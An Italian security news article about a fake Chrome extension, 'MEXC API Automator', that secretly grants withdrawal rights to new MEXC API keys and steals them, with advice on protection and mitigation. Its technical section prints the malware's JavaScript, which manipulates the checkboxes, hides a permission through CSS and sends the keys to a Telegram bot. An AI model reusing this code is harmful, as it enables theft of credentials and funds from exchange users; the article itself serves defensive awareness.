Se utilizzi MEXC per il trading di criptovalute, devi sapere che esiste un pericolo reale: un’estensione Chrome falsa chiamata MEXC API Automator ruba l’accesso ai tuoi conti. Questa estensione si presenta come uno strumento utile per automatizzare la creazione di chiavi API, ma in realtà è un programma malevolo che cattura le tue credenziali di accesso e le invia a criminali informatici.
La soluzione rapida: Non installare estensioni Chrome che promettono di automatizzare la creazione di chiavi API su MEXC. Crea sempre le tue chiavi API direttamente dal sito ufficiale di MEXC, senza l’aiuto di estensioni di terze parti.
Come funziona l’attacco
L’estensione malevola sfrutta la fiducia che gli utenti ripongono nelle estensioni del Chrome Web Store. Appare come un’applicazione legittima che promette “creazione facile di chiavi API con accesso al trading e ai prelievi” per lo scambio MEXC.
Una volta installata, l’estensione si attiva quando l’utente accede alla pagina di gestione API di MEXC, dove normalmente vengono create le chiavi per bot e trading automatizzato. Da questo momento in poi, l’estensione può:
– Creare chiavi API potenti senza il consenso dell’utente
– Abilitare i prelievi di fondi
– Eseguire operazioni di trading
– Accedere all’intero portafoglio di criptovalute
Perché le chiavi API sono così pericolose
A differenza delle password, le chiavi API sono spesso:
– Utilizzate per lunghi periodi senza cambiarle
– Riutilizzate in bot e script di trading
– Monitorate meno attentamente rispetto agli accessi interattivi
– Dotate di permessi illimitati per trading e prelievi
Questo le rende il bersaglio perfetto per i criminali informatici che vogliono rubare fondi senza dover craccare la password principale.
Il meccanismo di infezione
L’estensione MEXC API Automator è un’estensione Chrome Manifest V3 che inietta uno script di contenuto nella pagina di creazione delle chiavi API. Quando l’utente apre questa pagina, lo script:
- Seleziona automaticamente tutti i permessi, incluso quello di prelievo, senza richiedere alcun clic aggiuntivo
- Modifica l’interfaccia visiva per far sembrare disabilitata l’opzione di prelievo, anche se rimane attiva sul server
- Nasconde i segni visivi che indicano che il prelievo è abilitato
- Monitora continuamente la pagina per ripristinare le impostazioni maligne se MEXC tenta di correggerle
L’utente vede un’interfaccia che sembra sicura e controllata, ma in realtà la form inviata contiene i permessi completi per il prelievo.
Come vengono rubate le credenziali
Quando MEXC mostra il messaggio di successo con la nuova chiave API e la chiave segreta, lo script malevolo:
- Estrae i valori direttamente dal codice HTML della pagina
- Li invia a un bot Telegram controllato dall’attaccante
- Lo fa in background senza alcuna indicazione visibile all’utente
Poiché l’estensione opera all’interno della sandbox del browser e utilizza HTTPS standard, il traffico di rete appare completamente normale e non attira sospetti.
Le conseguenze dell’attacco
Una volta che il criminale ottiene le chiavi API, può:
– Accedere al tuo conto MEXC in qualsiasi momento
– Eseguire operazioni di trading senza il tuo consenso
– Prelevare i tuoi fondi e trasferirli a portafogli esterni
– Fare tutto questo senza mai conoscere la tua password principale
Solitamente, quando l’utente nota operazioni strane o fondi mancanti, il danno è già stato fatto e le chiavi sono state già utilizzate da script automatizzati per drenare completamente il conto.
Come proteggersi
Misure immediate:
– Non installare estensioni Chrome che promettono di automatizzare processi di MEXC
– Disinstalla immediatamente qualsiasi estensione sospetta dal tuo browser
– Accedi a MEXC e revoca tutte le chiavi API create di recente
– Cambia la password del tuo conto MEXC
– Abilita l’autenticazione a due fattori con Google Authenticator
Pratiche di sicurezza a lungo termine:
– Crea le chiavi API sempre direttamente dal sito ufficiale di MEXC
– Utilizza chiavi API separate per diversi bot e script
– Rivedi regolarmente le chiavi API attive nel tuo conto
– Limita i permessi delle chiavi API solo a ciò che è necessario
– Rinnova le chiavi API ogni 90 giorni utilizzando la funzione di rinnovo di MEXC
– Imposta restrizioni sulle coppie di trading che possono essere scambiate con ogni chiave
Chi è responsabile dell’attacco
I ricercatori di sicurezza hanno identificato l’estensione come malware vero e proprio, collegandola a un criminale informatico che utilizza il nome jorjortan142. Questo attaccante ha approfittato della fiducia che gli utenti ripongono nel Chrome Web Store per distribuire il malware.
Technical Deep Dive
Per gli utenti più esperti, ecco come funziona tecnicamente l’attacco:
Iniezione dello script di contenuto
L’estensione utilizza un pattern URL specifico per iniettare lo script: ://.mexc.com/user/openapi*. Questo garantisce che lo script sia attivo solo quando l’utente si trova sulla pagina di creazione delle chiavi API.
Manipolazione del DOM e del CSS
Lo script esegue le seguenti operazioni sul DOM:
`javascript
// Seleziona tutti i checkbox dei permessi
const checkboxes = document.querySelectorAll(‘input[type=”checkbox”]’);
checkboxes.forEach(cb => cb.checked = true);
// Rimuove la classe ‘checked’ dal checkbox di prelievo
const withdrawCheckbox = document.querySelector(‘[name=”withdraw”]’);
withdrawCheckbox.classList.remove(‘checked’);
// Inietta CSS per nascondere il segno di spunta
const style = document.createElement(‘style’);
style.textContent = ‘input[name=”withdraw”].checked::after { display: none; }’;
document.head.appendChild(style);
`
MutationObserver per la persistenza
L’estensione utilizza un MutationObserver per ripristinare continuamente lo stato malevolo:
`javascript
const observer = new MutationObserver(() => {
const withdrawCheckbox = document.querySelector(‘[name=”withdraw”]’);
if (withdrawCheckbox.classList.contains(‘checked’)) {
withdrawCheckbox.classList.remove(‘checked’);
}
});
observer.observe(document.body, { attributes: true, subtree: true });
`
Estrazione e trasmissione delle credenziali
Quando la pagina mostra il modal di successo, lo script estrae le credenziali e le invia a Telegram:
`javascript
const apiKeyElement = document.querySelector(‘[data-testid=”api-key”]’);
const secretKeyElement = document.querySelector(‘[data-testid=”secret-key”]’);
const apiKey = apiKeyElement.textContent;
const secretKey = secretKeyElement.textContent;
fetch(‘https://api.telegram.org/bot7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I/sendMessage’, {
method: ‘POST’,
headers: { ‘Content-Type’: ‘application/json’ },
body: JSON.stringify({
chat_id: ‘6526634583’,
text: API Key: ${apiKey}\nSecret Key: ${secretKey}
})
});
`
Perché il traffico appare normale
Poiché l’estensione:
– Opera all’interno della sandbox del browser
– Legge solo il contenuto della pagina (DOM)
– Invia dati su HTTPS standard
– Utilizza endpoint Telegram legittimi
Il traffico di rete appare completamente normale ai sistemi di monitoraggio standard. Non ci sono comunicazioni con server sospetti o pattern di rete anomali.
Indicatori di compromissione
I segnali che un conto potrebbe essere stato compromesso includono:
– Chiavi API create che l’utente non ricorda di aver creato
– Operazioni di trading non autorizzate
– Prelievi di fondi verso portafogli sconosciuti
– Messaggi di errore di accesso da posizioni geografiche inaspettate
– Cronologia di accesso che mostra login da IP non riconosciuti
Mitigazione a livello tecnico
Per gli amministratori di MEXC e gli sviluppatori di estensioni:
– Implementare Content Security Policy (CSP) rigorose
– Utilizzare token CSRF per tutte le operazioni sensibili
– Richiedere la conferma dell’utente tramite popup nativo (non DOM) per le operazioni critiche
– Monitorare le estensioni Chrome che accedono alle pagine di API
– Implementare rate limiting sulle creazioni di chiavi API
– Richiedere l’autenticazione a due fattori per la creazione di chiavi con permessi di prelievo
Questo attacco evidenzia l’importanza di non fidarsi ciecamente delle estensioni del Chrome Web Store e della necessità di implementare misure di sicurezza aggiuntive per le operazioni critiche.
Fonte: https://cybersecuritynews.com/malicious-chrome-extension-steals-wallet-login-credentials/
